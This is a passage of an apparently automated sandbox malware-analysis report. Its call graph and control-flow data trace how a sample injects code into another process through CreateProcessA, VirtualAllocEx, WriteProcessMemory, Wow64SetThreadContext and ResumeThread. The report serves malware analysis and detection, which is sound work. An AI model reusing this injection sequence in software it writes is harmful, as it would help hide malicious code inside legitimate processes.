                          execution_graph 36976 8e98ba8 36977 8e98bbc 36976->36977 36978 8e98bf8 36977->36978 36988 4de143e 36977->36988 36995 4de1c82 36977->36995 37000 4de1a05 36977->37000 37004 4de1c04 36977->37004 37008 4de1d36 36977->37008 37012 4de1488 36977->37012 37017 4de1f2a 36977->37017 37021 4de091a 36977->37021 37025 4de1c2c 36977->37025 36989 4de1453 36988->36989 37032 4de2740 36988->37032 37035 4de2739 36988->37035 36990 4de148c 36989->36990 36993 4de2739 VirtualProtect 36989->36993 36994 4de2740 VirtualProtect 36989->36994 36993->36989 36994->36989 36996 4de1c3f 36995->36996 36997 4de1c85 36995->36997 36996->36995 36998 4de2739 VirtualProtect 36996->36998 36999 4de2740 VirtualProtect 36996->36999 36998->36996 36999->36996 37002 4de2739 VirtualProtect 37000->37002 37003 4de2740 VirtualProtect 37000->37003 37001 4de1a19 37002->37001 37003->37001 37006 4de2739 VirtualProtect 37004->37006 37007 4de2740 VirtualProtect 37004->37007 37005 4de1c15 37006->37005 37007->37005 37010 4de2739 VirtualProtect 37008->37010 37011 4de2740 VirtualProtect 37008->37011 37009 4de1d4a 37010->37009 37011->37009 37013 4de148c 37012->37013 37014 4de1453 37012->37014 37014->37012 37015 4de2739 VirtualProtect 37014->37015 37016 4de2740 VirtualProtect 37014->37016 37015->37014 37016->37014 37019 4de2739 VirtualProtect 37017->37019 37020 4de2740 VirtualProtect 37017->37020 37018 4de1f3b 37019->37018 37020->37018 37023 4de2739 VirtualProtect 37021->37023 37024 4de2740 VirtualProtect 37021->37024 37022 4de092b 37023->37022 37024->37022 37026 4de1c3f 37025->37026 37028 4de2739 VirtualProtect 37025->37028 37029 4de2740 VirtualProtect 37025->37029 37027 4de1c85 37026->37027 37030 4de2739 VirtualProtect 37026->37030 37031 4de2740 VirtualProtect 37026->37031 37028->37026 37029->37026 37030->37026 37031->37026 37033 4de2788 VirtualProtect 37032->37033 37034 4de27c2 37033->37034 37034->36989 37036 4de2740 VirtualProtect 37035->37036 37038 4de27c2 37036->37038 37038->36989 37039 137d420 37040 137d466 GetCurrentProcess 37039->37040 37042 137d4b1 37040->37042 37043 137d4b8 GetCurrentThread 37040->37043 37042->37043 37044 137d4f5 GetCurrentProcess 37043->37044 37045 137d4ee 37043->37045 37046 137d52b 37044->37046 37045->37044 37047 137d553 GetCurrentThreadId 37046->37047 37048 137d584 37047->37048 37051 1374a10 37052 1374a19 37051->37052 37053 1374a1f 37052->37053 37055 1374b09 37052->37055 37056 1374b2d 37055->37056 37060 1374c09 37056->37060 37064 1374c18 37056->37064 37061 1374c3f 37060->37061 37062 1374d1c 37061->37062 37068 13747f4 37061->37068 37062->37062 37066 1374c3f 37064->37066 37065 1374d1c 37065->37065 37066->37065 37067 13747f4 CreateActCtxA 37066->37067 37067->37065 37069 1375ca8 CreateActCtxA 37068->37069 37071 1375d6b 37069->37071 37072 137b090 37073 137b09f 37072->37073 37076 137b178 37072->37076 37084 137b188 37072->37084 37077 137b199 37076->37077 37078 137b1bc 37076->37078 37077->37078 37092 137b411 37077->37092 37096 137b420 37077->37096 37078->37073 37079 137b1b4 37079->37078 37080 137b3c0 GetModuleHandleW 37079->37080 37081 137b3ed 37080->37081 37081->37073 37085 137b199 37084->37085 37086 137b1bc 37084->37086 37085->37086 37090 137b411 LoadLibraryExW 37085->37090 37091 137b420 LoadLibraryExW 37085->37091 37086->37073 37087 137b1b4 37087->37086 37088 137b3c0 GetModuleHandleW 37087->37088 37089 137b3ed 37088->37089 37089->37073 37090->37087 37091->37087 37093 137b434 37092->37093 37095 137b459 37093->37095 37100 137ab90 37093->37100 37095->37079 37097 137b434 37096->37097 37098 137b459 37097->37098 37099 137ab90 LoadLibraryExW 37097->37099 37098->37079 37099->37098 37101 137b600 LoadLibraryExW 37100->37101 37103 137b679 37101->37103 37103->37095 37104 4df3422 37105 4df3428 37104->37105 37110 4df5c46 37105->37110 37127 4df5be0 37105->37127 37143 4df5bd3 37105->37143 37106 4df3433 37111 4df5bd4 37110->37111 37113 4df5c49 37110->37113 37112 4df5c02 37111->37112 37159 4df6211 37111->37159 37164 4df62b1 37111->37164 37170 4df6373 37111->37170 37174 4df6594 37111->37174 37179 4df6136 37111->37179 37184 4df6319 37111->37184 37189 4df639c 37111->37189 37194 4df6360 37111->37194 37199 4df67ab 37111->37199 37203 4df652d 37111->37203 37208 4df634e 37111->37208 37213 4df606f 37111->37213 37218 4df624f 37111->37218 37112->37106 37113->37106 37128 4df5bfa 37127->37128 37129 4df639c 2 API calls 37128->37129 37130 4df6319 2 API calls 37128->37130 37131 4df6136 2 API calls 37128->37131 37132 4df6594 2 API calls 37128->37132 37133 4df6373 VirtualAllocEx 37128->37133 37134 4df62b1 2 API calls 37128->37134 37135 4df6211 2 API calls 37128->37135 37136 4df624f 2 API calls 37128->37136 37137 4df606f 2 API calls 37128->37137 37138 4df634e 2 API calls 37128->37138 37139 4df652d 2 API calls 37128->37139 37140 4df67ab 2 API calls 37128->37140 37141 4df5c02 37128->37141 37142 4df6360 2 API calls 37128->37142 37129->37141 37130->37141 37131->37141 37132->37141 37133->37141 37134->37141 37135->37141 37136->37141 37137->37141 37138->37141 37139->37141 37140->37141 37141->37106 37142->37141 37144 4df5be0 37143->37144 37145 4df639c 2 API calls 37144->37145 37146 4df6319 2 API calls 37144->37146 37147 4df6136 2 API calls 37144->37147 37148 4df6594 2 API calls 37144->37148 37149 4df6373 VirtualAllocEx 37144->37149 37150 4df62b1 2 API calls 37144->37150 37151 4df6211 2 API calls 37144->37151 37152 4df624f 2 API calls 37144->37152 37153 4df606f 2 API calls 37144->37153 37154 4df634e 2 API calls 37144->37154 37155 4df652d 2 API calls 37144->37155 37156 4df67ab 2 API calls 37144->37156 37157 4df5c02 37144->37157 37158 4df6360 2 API calls 37144->37158 37145->37157 37146->37157 37147->37157 37148->37157 37149->37157 37150->37157 37151->37157 37152->37157 37153->37157 37154->37157 37155->37157 37156->37157 37157->37106 37158->37157 37160 4df6907 37159->37160 37223 4df2b18 37160->37223 37227 4df2b20 37160->37227 37161 4df6982 37165 4df6270 37164->37165 37167 4df6192 37164->37167 37231 4df2c08 37165->37231 37235 4df2c10 37165->37235 37166 4df61c1 37166->37112 37167->37112 37171 4df65a4 37170->37171 37239 4df2a60 37171->37239 37175 4df6747 37174->37175 37243 4df2548 37175->37243 37247 4df2550 37175->37247 37176 4df6762 37176->37112 37180 4df613c 37179->37180 37181 4df616a 37180->37181 37251 4df2da8 37180->37251 37255 4df2da3 37180->37255 37181->37112 37185 4df6326 37184->37185 37187 4df2b18 WriteProcessMemory 37185->37187 37188 4df2b20 WriteProcessMemory 37185->37188 37186 4df66a6 37187->37186 37188->37186 37190 4df6327 37189->37190 37192 4df2b18 WriteProcessMemory 37190->37192 37193 4df2b20 WriteProcessMemory 37190->37193 37191 4df66a6 37192->37191 37193->37191 37195 4df636d 37194->37195 37259 4df2498 37195->37259 37263 4df24a0 37195->37263 37196 4df6192 37196->37112 37201 4df2b18 WriteProcessMemory 37199->37201 37202 4df2b20 WriteProcessMemory 37199->37202 37200 4df67cf 37201->37200 37202->37200 37204 4df653d 37203->37204 37206 4df2498 ResumeThread 37204->37206 37207 4df24a0 ResumeThread 37204->37207 37205 4df6192 37205->37112 37206->37205 37207->37205 37209 4df6634 37208->37209 37211 4df2548 Wow64SetThreadContext 37209->37211 37212 4df2550 Wow64SetThreadContext 37209->37212 37210 4df6395 37210->37112 37211->37210 37212->37210 37214 4df6075 37213->37214 37216 4df2da8 CreateProcessA 37214->37216 37217 4df2da3 CreateProcessA 37214->37217 37215 4df616a 37215->37112 37216->37215 37217->37215 37219 4df6255 37218->37219 37221 4df2c08 ReadProcessMemory 37219->37221 37222 4df2c10 ReadProcessMemory 37219->37222 37220 4df61c1 37220->37112 37221->37220 37222->37220 37224 4df2b20 WriteProcessMemory 37223->37224 37226 4df2bbf 37224->37226 37226->37161 37228 4df2b68 WriteProcessMemory 37227->37228 37230 4df2bbf 37228->37230 37230->37161 37232 4df2c10 ReadProcessMemory 37231->37232 37234 4df2c9f 37232->37234 37234->37166 37236 4df2c5b ReadProcessMemory 37235->37236 37238 4df2c9f 37236->37238 37238->37166 37240 4df2aa0 VirtualAllocEx 37239->37240 37242 4df2add 37240->37242 37244 4df2550 Wow64SetThreadContext 37243->37244 37246 4df25dd 37244->37246 37246->37176 37248 4df2595 Wow64SetThreadContext 37247->37248 37250 4df25dd 37248->37250 37250->37176 37252 4df2e31 CreateProcessA 37251->37252 37254 4df2ff3 37252->37254 37256 4df2da8 CreateProcessA 37255->37256 37258 4df2ff3 37256->37258 37260 4df249e ResumeThread 37259->37260 37262 4df2511 37260->37262 37262->37196 37264 4df24e0 ResumeThread 37263->37264 37266 4df2511 37264->37266 37266->37196 37049 137d668 DuplicateHandle 37050 137d6fe 37049->37050 37267 4df6f20 37268 4df70ab 37267->37268 37270 4df6f46 37267->37270 37270->37268 37271 4df5368 37270->37271 37272 4df71a0 PostMessageW 37271->37272 37273 4df720c 37272->37273 37273->37270

                          Executed Functions

                          Function 04DE2D38 Relevance: 5.5, Strings: 4, Instructions: 497COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 44 4de2d38-4de2d63 45 4de2d6a-4de2db2 44->45 46 4de2d65 44->46 47 4de2db3 45->47 46->45 48 4de2dba-4de2dd6 47->48 49 4de2ddf-4de2de0 48->49 50 4de2dd8 48->50 64 4de2e42-4de2e8a 49->64 50->47 50->49 51 4de30df 50->51 52 4de309c-4de30bb 50->52 53 4de2f1d-4de2f42 50->53 54 4de2f59-4de2f5d 50->54 55 4de2e16 call 4de3618 50->55 56 4de3012-4de3024 50->56 57 4de2f90-4de2fa2 50->57 58 4de2ed1-4de2eea 50->58 59 4de2fce-4de2ff5 50->59 60 4de310e-4de312c 50->60 61 4de2e8d 50->61 62 4de3084-4de3097 50->62 63 4de2f44-4de2f57 50->63 50->64 65 4de3143 50->65 66 4de30c0-4de30dd 50->66 67 4de2e01-4de2e14 50->67 68 4de2ebc-4de2ecf 50->68 69 4de2ffa-4de300d 50->69 70 4de312e-4de3141 50->70 71 4de316c 50->71 72 4de2eeb 50->72 73 4de2de2 50->73 77 4de30e6-4de3102 51->77 75 4de2ef2-4de2f0e 52->75 53->75 78 4de2f5f-4de2f6e 54->78 79 4de2f70-4de2f77 54->79 95 4de2e1c-4de2e3d 55->95 164 4de302a call 4de4318 56->164 165 4de302a call 4de4309 56->165 81 4de2fa4-4de2fb3 57->81 82 4de2fb5-4de2fbc 57->82 58->72 59->75 60->77 74 4de2e94-4de2eb0 61->74 62->75 63->75 64->61 65->71 66->51 66->65 67->48 68->74 69->75 70->77 80 4de3173-4de318f 71->80 72->75 159 4de2de7 call 4de35e8 73->159 160 4de2de7 call 4de35d9 73->160 99 4de2eb9-4de2eba 74->99 100 4de2eb2 74->100 84 4de2f17-4de2f18 75->84 85 4de2f10 75->85 86 4de310b-4de310c 77->86 87 4de3104 77->87 90 4de2f7e-4de2f8b 78->90 79->90 92 4de3198-4de3199 80->92 93 4de3191 80->93 94 4de2fc3-4de2fc9 81->94 82->94 84->66 85->51 85->52 85->53 85->54 85->56 85->57 85->59 85->60 85->62 85->63 85->65 85->66 85->69 85->70 85->71 85->72 85->84 101 4de323f-4de3242 85->101 102 4de319b-4de31b6 85->102 103 4de31b8-4de31cb 85->103 104 4de31cd 85->104 86->65 87->51 87->60 87->65 87->70 87->71 87->86 87->101 87->102 87->103 87->104 90->75 91 4de2ded-4de2dff 91->48 92->104 93->71 93->92 93->101 93->102 93->103 93->104 105 4de339e-4de340f 93->105 106 4de352f-4de3537 93->106 107 4de31e8 93->107 108 4de32c6-4de336f 93->108 109 4de32a5 93->109 110 4de3223 93->110 94->75 95->48 99->58 100->51 100->52 100->53 100->54 100->56 100->57 100->58 100->59 100->60 100->61 100->62 100->63 100->65 100->66 100->68 100->69 100->70 100->71 100->72 100->99 100->101 100->102 100->103 100->104 166 4de3245 call 4de7a6f 101->166 167 4de3245 call 4de7a3c 101->167 168 4de3245 call 4de7a34 101->168 169 4de3245 call 4de7a80 101->169 102->80 103->80 104->107 172 4de3415 call 4de6c48 105->172 173 4de3415 call 4de6c38 105->173 112 4de31ef-4de320b 107->112 161 4de3372 call 4de4318 108->161 162 4de3372 call 4de4309 108->162 170 4de32a8 call 4dea8f8 109->170 171 4de32a8 call 4dea908 109->171 155 4de3225 call 4df6ecf 110->155 156 4de3225 call 4df6ee0 110->156 118 4de321d-4de321e 112->118 119 4de320d 112->119 113 4de3030-4de303b 123 4de3046-4de307f 113->123 114 4de324b-4de3262 157 4de3267 call 4de92d0 114->157 158 4de3267 call 4de92c0 114->158 115 4de32ae-4de32c1 115->112 118->106 119->101 119->105 119->106 119->107 119->108 119->109 119->110 119->118 121 4de322b-4de323d 121->112 123->75 124 4de326d-4de3273 129 4de327f-4de32a0 124->129 129->112 133 4de341b-4de3428 135 4de342a-4de3436 133->135 136 4de3452 133->136 137 4de3438-4de343e 135->137 138 4de3440-4de3446 135->138 139 4de3458-4de34e5 136->139 141 4de3450 137->141 138->141 149 4de350f 139->149 150 4de34e7-4de34f3 139->150 141->139 145 4de3378-4de3399 145->112 153 4de3515-4de352a 149->153 151 4de34fd-4de3503 150->151 152 4de34f5-4de34fb 150->152 154 4de350d 151->154 152->154 153->112 154->153 155->121 156->121 157->124 158->124 159->91 160->91 161->145 162->145 164->113 165->113 166->114 167->114 168->114 169->114 170->115 171->115 172->133 173->133
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: /V-+$^f6$Zku$`yT
                          • API String ID: 0-1940165033
                          • Opcode ID: 238a9a519862906d2be2a2904463104bb8f58aebc3575c95fb8d68be3e70179b
                          • Instruction ID: 660e760a08700a1f6d6d57b60b30bf0e9badbcfbb1ee32e79183a9ee7c1bbcf0
                          • Opcode Fuzzy Hash: 238a9a519862906d2be2a2904463104bb8f58aebc3575c95fb8d68be3e70179b
                          • Instruction Fuzzy Hash: 22221774E15219DFDB14DFAAD9847ADBBB2BF89300F10C4AAD809AB354DB349981CF14
                          Function 04DE2D29 Relevance: 5.5, Strings: 4, Instructions: 477COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 174 4de2d29-4de2d63 175 4de2d6a-4de2db2 174->175 176 4de2d65 174->176 177 4de2db3 175->177 176->175 178 4de2dba-4de2dd6 177->178 179 4de2ddf-4de2de0 178->179 180 4de2dd8 178->180 194 4de2e42-4de2e8a 179->194 180->177 180->179 181 4de30df 180->181 182 4de309c-4de30bb 180->182 183 4de2f1d-4de2f42 180->183 184 4de2f59-4de2f5d 180->184 185 4de2e16 call 4de3618 180->185 186 4de3012-4de3024 180->186 187 4de2f90-4de2fa2 180->187 188 4de2ed1-4de2eea 180->188 189 4de2fce-4de2ff5 180->189 190 4de310e-4de312c 180->190 191 4de2e8d 180->191 192 4de3084-4de3097 180->192 193 4de2f44-4de2f57 180->193 180->194 195 4de3143 180->195 196 4de30c0-4de30dd 180->196 197 4de2e01-4de2e14 180->197 198 4de2ebc-4de2ecf 180->198 199 4de2ffa-4de300d 180->199 200 4de312e-4de3141 180->200 201 4de316c 180->201 202 4de2eeb 180->202 203 4de2de2 180->203 207 4de30e6-4de3102 181->207 205 4de2ef2-4de2f0e 182->205 183->205 208 4de2f5f-4de2f6e 184->208 209 4de2f70-4de2f77 184->209 225 4de2e1c-4de2e3d 185->225 292 4de302a call 4de4318 186->292 293 4de302a call 4de4309 186->293 211 4de2fa4-4de2fb3 187->211 212 4de2fb5-4de2fbc 187->212 188->202 189->205 190->207 204 4de2e94-4de2eb0 191->204 192->205 193->205 194->191 195->201 196->181 196->195 197->178 198->204 199->205 200->207 210 4de3173-4de318f 201->210 202->205 287 4de2de7 call 4de35e8 203->287 288 4de2de7 call 4de35d9 203->288 229 4de2eb9-4de2eba 204->229 230 4de2eb2 204->230 214 4de2f17-4de2f18 205->214 215 4de2f10 205->215 216 4de310b-4de310c 207->216 217 4de3104 207->217 220 4de2f7e-4de2f8b 208->220 209->220 222 4de3198-4de3199 210->222 223 4de3191 210->223 224 4de2fc3-4de2fc9 211->224 212->224 214->196 215->181 215->182 215->183 215->184 215->186 215->187 215->189 215->190 215->192 215->193 215->195 215->196 215->199 215->200 215->201 215->202 215->214 231 4de323f-4de3242 215->231 232 4de319b-4de31b6 215->232 233 4de31b8-4de31cb 215->233 234 4de31cd 215->234 216->195 217->181 217->190 217->195 217->200 217->201 217->216 217->231 217->232 217->233 217->234 220->205 221 4de2ded-4de2dff 221->178 222->234 223->201 223->222 223->231 223->232 223->233 223->234 235 4de339e-4de340f 223->235 236 4de352f-4de3537 223->236 237 4de31e8 223->237 238 4de32c6-4de336f 223->238 239 4de32a5 223->239 240 4de3223 223->240 224->205 225->178 229->188 230->181 230->182 230->183 230->184 230->186 230->187 230->188 230->189 230->190 230->191 230->192 230->193 230->195 230->196 230->198 230->199 230->200 230->201 230->202 230->229 230->231 230->232 230->233 230->234 294 4de3245 call 4de7a6f 231->294 295 4de3245 call 4de7a3c 231->295 296 4de3245 call 4de7a34 231->296 297 4de3245 call 4de7a80 231->297 232->210 233->210 234->237 300 4de3415 call 4de6c48 235->300 301 4de3415 call 4de6c38 235->301 242 4de31ef-4de320b 237->242 289 4de3372 call 4de4318 238->289 290 4de3372 call 4de4309 238->290 298 4de32a8 call 4dea8f8 239->298 299 4de32a8 call 4dea908 239->299 302 4de3225 call 4df6ecf 240->302 303 4de3225 call 4df6ee0 240->303 248 4de321d-4de321e 242->248 249 4de320d 242->249 243 4de3030-4de303b 253 4de3046-4de307f 243->253 244 4de324b-4de3262 285 4de3267 call 4de92d0 244->285 286 4de3267 call 4de92c0 244->286 245 4de32ae-4de32c1 245->242 248->236 249->231 249->235 249->236 249->237 249->238 249->239 249->240 249->248 251 4de322b-4de323d 251->242 253->205 254 4de326d-4de3273 259 4de327f-4de32a0 254->259 259->242 263 4de341b-4de3428 265 4de342a-4de3436 263->265 266 4de3452 263->266 267 4de3438-4de343e 265->267 268 4de3440-4de3446 265->268 269 4de3458-4de34e5 266->269 271 4de3450 267->271 268->271 279 4de350f 269->279 280 4de34e7-4de34f3 269->280 271->269 275 4de3378-4de3399 275->242 283 4de3515-4de352a 279->283 281 4de34fd-4de3503 280->281 282 4de34f5-4de34fb 280->282 284 4de350d 281->284 282->284 283->242 284->283 285->254 286->254 287->221 288->221 289->275 290->275 292->243 293->243 294->244 295->244 296->244 297->244 298->245 299->245 300->263 301->263 302->251 303->251
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: /V-+$^f6$Zku$`yT
                          • API String ID: 0-1940165033
                          • Opcode ID: d5bdc45d43e6b20a3768a170da2bc1713f14fe97697bca783227b5aa3ad63e50
                          • Instruction ID: 2249b860bd6a4660e6058fc3e7c66059fb34d322a24cb736a362ffda937a59f5
                          • Opcode Fuzzy Hash: d5bdc45d43e6b20a3768a170da2bc1713f14fe97697bca783227b5aa3ad63e50
                          • Instruction Fuzzy Hash: 90220774E15219DFDB54DFAAD9847ADBBB2BF88300F10C4AAD809AB354DB349981CF14
                          Function 08E9B840 Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 304 8e9b840-8e9b865 305 8e9b86c-8e9b889 304->305 306 8e9b867 304->306 307 8e9b891 305->307 306->305 308 8e9b898-8e9b8b4 307->308 309 8e9b8bd-8e9b8be 308->309 310 8e9b8b6 308->310 330 8e9bc36-8e9bc3d 309->330 310->307 310->309 311 8e9bbc9-8e9bbd5 310->311 312 8e9b9c8-8e9b9df 310->312 313 8e9ba68-8e9ba94 310->313 314 8e9b92b-8e9b940 310->314 315 8e9bb80-8e9bb97 310->315 316 8e9b8c3-8e9b8d8 310->316 317 8e9b945-8e9b949 310->317 318 8e9bac6-8e9baca 310->318 319 8e9ba99-8e9baa5 310->319 320 8e9bb1b-8e9bb24 310->320 321 8e9bc1a-8e9bc31 310->321 322 8e9b8da-8e9b8e6 310->322 323 8e9bb9c-8e9bba8 310->323 324 8e9b99f-8e9b9b1 310->324 325 8e9b9fe-8e9ba12 310->325 326 8e9bb50-8e9bb54 310->326 327 8e9b975-8e9b99a 310->327 328 8e9ba17-8e9ba23 310->328 329 8e9baf6-8e9bb16 310->329 310->330 331 8e9b9b6-8e9b9c3 310->331 342 8e9bbdc-8e9bbf2 311->342 343 8e9bbd7 311->343 373 8e9b9e1 call 8e9be48 312->373 374 8e9b9e1 call 8e9be38 312->374 313->308 314->308 315->308 316->308 346 8e9b94b-8e9b95a 317->346 347 8e9b95c-8e9b963 317->347 348 8e9badd-8e9bae4 318->348 349 8e9bacc-8e9badb 318->349 344 8e9baac-8e9bac1 319->344 345 8e9baa7 319->345 332 8e9bb37-8e9bb3e 320->332 333 8e9bb26-8e9bb35 320->333 321->308 340 8e9b8e8 322->340 341 8e9b8ed-8e9b903 322->341 338 8e9bbaa 323->338 339 8e9bbaf-8e9bbc4 323->339 324->308 325->308 336 8e9bb67-8e9bb6e 326->336 337 8e9bb56-8e9bb65 326->337 327->308 334 8e9ba2a-8e9ba40 328->334 335 8e9ba25 328->335 329->308 331->308 352 8e9bb45-8e9bb4b 332->352 333->352 363 8e9ba42 334->363 364 8e9ba47-8e9ba63 334->364 335->334 353 8e9bb75-8e9bb7b 336->353 337->353 338->339 339->308 340->341 365 8e9b90a-8e9b926 341->365 366 8e9b905 341->366 368 8e9bbf9-8e9bc15 342->368 369 8e9bbf4 342->369 343->342 344->308 345->344 355 8e9b96a-8e9b970 346->355 347->355 356 8e9baeb-8e9baf1 348->356 349->356 351 8e9b9e7-8e9b9f9 351->308 352->308 353->308 355->308 356->308 363->364 364->308 365->308 366->365 368->308 369->368 373->351 374->351
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: />X$/>X$P,0e
                          • API String ID: 0-1511438267
                          • Opcode ID: d1d8aadd9437742271b2a9757d9275781d7ebd0fd8495ec1875a65318df7e623
                          • Instruction ID: 9f47c126f91ee7e6fd2a4fcc50421c11afa4e384de4d875e786ea7a5d5f85db9
                          • Opcode Fuzzy Hash: d1d8aadd9437742271b2a9757d9275781d7ebd0fd8495ec1875a65318df7e623
                          • Instruction Fuzzy Hash: D1C16771D0021ADFCF18CFA5D4808AEFBB6FF88351F11A529D405AB218DB70AA42CF94
                          Function 08E9B830 Relevance: 4.0, Strings: 3, Instructions: 279COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 375 8e9b830-8e9b865 376 8e9b86c-8e9b889 375->376 377 8e9b867 375->377 378 8e9b891 376->378 377->376 379 8e9b898-8e9b8b4 378->379 380 8e9b8bd-8e9b8be 379->380 381 8e9b8b6 379->381 401 8e9bc36-8e9bc3d 380->401 381->378 381->380 382 8e9bbc9-8e9bbd5 381->382 383 8e9b9c8-8e9b9df 381->383 384 8e9ba68-8e9ba94 381->384 385 8e9b92b-8e9b940 381->385 386 8e9bb80-8e9bb97 381->386 387 8e9b8c3-8e9b8d8 381->387 388 8e9b945-8e9b949 381->388 389 8e9bac6-8e9baca 381->389 390 8e9ba99-8e9baa5 381->390 391 8e9bb1b-8e9bb24 381->391 392 8e9bc1a-8e9bc31 381->392 393 8e9b8da-8e9b8e6 381->393 394 8e9bb9c-8e9bba8 381->394 395 8e9b99f-8e9b9b1 381->395 396 8e9b9fe-8e9ba12 381->396 397 8e9bb50-8e9bb54 381->397 398 8e9b975-8e9b99a 381->398 399 8e9ba17-8e9ba23 381->399 400 8e9baf6-8e9bb16 381->400 381->401 402 8e9b9b6-8e9b9c3 381->402 413 8e9bbdc-8e9bbf2 382->413 414 8e9bbd7 382->414 444 8e9b9e1 call 8e9be48 383->444 445 8e9b9e1 call 8e9be38 383->445 384->379 385->379 386->379 387->379 417 8e9b94b-8e9b95a 388->417 418 8e9b95c-8e9b963 388->418 419 8e9badd-8e9bae4 389->419 420 8e9bacc-8e9badb 389->420 415 8e9baac-8e9bac1 390->415 416 8e9baa7 390->416 403 8e9bb37-8e9bb3e 391->403 404 8e9bb26-8e9bb35 391->404 392->379 411 8e9b8e8 393->411 412 8e9b8ed-8e9b903 393->412 409 8e9bbaa 394->409 410 8e9bbaf-8e9bbc4 394->410 395->379 396->379 407 8e9bb67-8e9bb6e 397->407 408 8e9bb56-8e9bb65 397->408 398->379 405 8e9ba2a-8e9ba40 399->405 406 8e9ba25 399->406 400->379 402->379 423 8e9bb45-8e9bb4b 403->423 404->423 434 8e9ba42 405->434 435 8e9ba47-8e9ba63 405->435 406->405 424 8e9bb75-8e9bb7b 407->424 408->424 409->410 410->379 411->412 436 8e9b90a-8e9b926 412->436 437 8e9b905 412->437 439 8e9bbf9-8e9bc15 413->439 440 8e9bbf4 413->440 414->413 415->379 416->415 426 8e9b96a-8e9b970 417->426 418->426 427 8e9baeb-8e9baf1 419->427 420->427 422 8e9b9e7-8e9b9f9 422->379 423->379 424->379 426->379 427->379 434->435 435->379 436->379 437->436 439->379 440->439 444->422 445->422
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: />X$/>X$P,0e
                          • API String ID: 0-1511438267
                          • Opcode ID: db40dc22d268f021d019d20a1dd075c6cd1cd2c5b4784018607327370009fe3d
                          • Instruction ID: 47a85f3af8c3e912119796117e0f15f4f93f3ed38efdbc01cfaea923b555cb38
                          • Opcode Fuzzy Hash: db40dc22d268f021d019d20a1dd075c6cd1cd2c5b4784018607327370009fe3d
                          • Instruction Fuzzy Hash: 10C19971D0021ADFCB18CFA5D4818AEFBB6FF88351B11A529D445AB214DB74EA42CF94
                          Function 08E9B828 Relevance: 4.0, Strings: 3, Instructions: 277COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 446 8e9b828-8e9b865 448 8e9b86c-8e9b889 446->448 449 8e9b867 446->449 450 8e9b891 448->450 449->448 451 8e9b898-8e9b8b4 450->451 452 8e9b8bd-8e9b8be 451->452 453 8e9b8b6 451->453 473 8e9bc36-8e9bc3d 452->473 453->450 453->452 454 8e9bbc9-8e9bbd5 453->454 455 8e9b9c8-8e9b9df 453->455 456 8e9ba68-8e9ba94 453->456 457 8e9b92b-8e9b940 453->457 458 8e9bb80-8e9bb97 453->458 459 8e9b8c3-8e9b8d8 453->459 460 8e9b945-8e9b949 453->460 461 8e9bac6-8e9baca 453->461 462 8e9ba99-8e9baa5 453->462 463 8e9bb1b-8e9bb24 453->463 464 8e9bc1a-8e9bc31 453->464 465 8e9b8da-8e9b8e6 453->465 466 8e9bb9c-8e9bba8 453->466 467 8e9b99f-8e9b9b1 453->467 468 8e9b9fe-8e9ba12 453->468 469 8e9bb50-8e9bb54 453->469 470 8e9b975-8e9b99a 453->470 471 8e9ba17-8e9ba23 453->471 472 8e9baf6-8e9bb16 453->472 453->473 474 8e9b9b6-8e9b9c3 453->474 485 8e9bbdc-8e9bbf2 454->485 486 8e9bbd7 454->486 516 8e9b9e1 call 8e9be48 455->516 517 8e9b9e1 call 8e9be38 455->517 456->451 457->451 458->451 459->451 489 8e9b94b-8e9b95a 460->489 490 8e9b95c-8e9b963 460->490 491 8e9badd-8e9bae4 461->491 492 8e9bacc-8e9badb 461->492 487 8e9baac-8e9bac1 462->487 488 8e9baa7 462->488 475 8e9bb37-8e9bb3e 463->475 476 8e9bb26-8e9bb35 463->476 464->451 483 8e9b8e8 465->483 484 8e9b8ed-8e9b903 465->484 481 8e9bbaa 466->481 482 8e9bbaf-8e9bbc4 466->482 467->451 468->451 479 8e9bb67-8e9bb6e 469->479 480 8e9bb56-8e9bb65 469->480 470->451 477 8e9ba2a-8e9ba40 471->477 478 8e9ba25 471->478 472->451 474->451 495 8e9bb45-8e9bb4b 475->495 476->495 506 8e9ba42 477->506 507 8e9ba47-8e9ba63 477->507 478->477 496 8e9bb75-8e9bb7b 479->496 480->496 481->482 482->451 483->484 508 8e9b90a-8e9b926 484->508 509 8e9b905 484->509 511 8e9bbf9-8e9bc15 485->511 512 8e9bbf4 485->512 486->485 487->451 488->487 498 8e9b96a-8e9b970 489->498 490->498 499 8e9baeb-8e9baf1 491->499 492->499 494 8e9b9e7-8e9b9f9 494->451 495->451 496->451 498->451 499->451 506->507 507->451 508->451 509->508 511->451 512->511 516->494 517->494
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
